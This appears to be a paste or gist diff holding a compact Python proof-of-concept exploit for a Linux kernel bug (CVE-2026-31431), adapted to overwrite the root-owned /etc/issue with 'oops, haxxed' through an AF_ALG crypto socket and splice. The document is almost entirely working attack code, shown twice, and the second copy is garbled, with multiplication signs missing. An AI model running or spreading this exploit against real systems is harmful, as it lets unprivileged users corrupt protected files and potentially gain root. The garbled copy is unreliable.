dramforever · April 30, 2026 07:14
diff --git a/copyfail-etc-issue.py b/copyfail-etc-issue.py
 #!/usr/bin/env python3

 # Based on https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/main/copy_fail_exp.py
 # Changed to write to /etc/issue instead of dropping a binary to allow it to do something visible on a non-x86_64 machine.

 import os as g,zlib,socket as s
 def d(x):return bytes.fromhex(x)
 def c(f,t,c):
 a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
 try:u.recv(8+t)
 except:0
 f=g.open("/etc/issue",0);i=0;e=b"oops, haxxed"
 while i<len(e):c(f,i,e[i:i+4]);i+=4

 with open("/etc/issue") as f:
    assert f.read().startswith("oops, haxxed")
	#!/usr/bin/env python3

	# Based on https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/main/copy_fail_exp.py
	# Changed to write to /etc/issue instead of dropping a binary to allow it to do something visible on a non-x86_64 machine.

	import os as g,zlib,socket as s
	def d(x):return bytes.fromhex(x)
	def c(f,t,c):
	a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"4+c],[(h,3,i4),(h,2,b'\x10'+i19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
	try:u.recv(8+t)
	except:0
	f=g.open("/etc/issue",0);i=0;e=b"oops, haxxed"
	while i<len(e):c(f,i,e[i:i+4]);i+=4

	with open("/etc/issue") as f:
	assert f.read().startswith("oops, haxxed")
No results found